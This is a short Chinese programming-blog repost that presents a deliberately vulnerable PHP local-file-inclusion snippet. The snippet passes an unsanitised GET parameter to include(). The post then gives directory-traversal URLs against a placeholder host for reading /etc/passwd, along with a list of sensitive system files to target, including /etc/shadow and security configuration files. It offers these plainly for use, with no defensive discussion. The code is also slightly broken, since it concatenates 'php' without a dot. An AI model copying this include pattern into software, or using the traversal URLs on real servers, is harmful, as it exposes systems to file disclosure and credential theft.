1. 首页
  2. 文章中心
  3. PHP编程

php 伪造本地文件包含漏洞的代码

133 阅读 0 评论
我是靠谱客的博主 强健溪流,这篇文章主要介绍php 伪造本地文件包含漏洞的代码,现在分享给大家,希望可以做个参考。

代码:

复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

最后

以上就是强健溪流最近收集整理的关于php 伪造本地文件包含漏洞的代码的全部内容,更多相关php内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(88)

相关文章

Python3下错误AttributeError: ‘dict’ object has
Python3下错误AttributeError: ‘dict’ object has
JS实现简单的天数计算器完整实例
JS实现简单的天数计算器完整实例
Windows系统中对弹出菜单、下拉菜单、右键菜单截图的方法
Windows系统中对弹出菜单、下拉菜单、右键菜单截图的方法
windows8中怎么关闭用户账户控制(UAC)仅针对单个用户
windows8中怎么关闭用户账户控制(UAC)仅针对单个用户
php 伪造本地文件包含漏洞的代码
php 伪造本地文件包含漏洞的代码
Win10正式版来宾账户添加的方法与预览版有何不同?
Win10正式版来宾账户添加的方法与预览版有何不同?
PHP使用stream_context_create()模拟POST/GET请求的方法
PHP使用stream_context_create()模拟POST/GET请求的方法
用vbs列出注册表中 Run 项中的所有项目
用vbs列出注册表中 Run 项中的所有项目

评论列表共有 0 条评论

立即
投稿
返回
顶部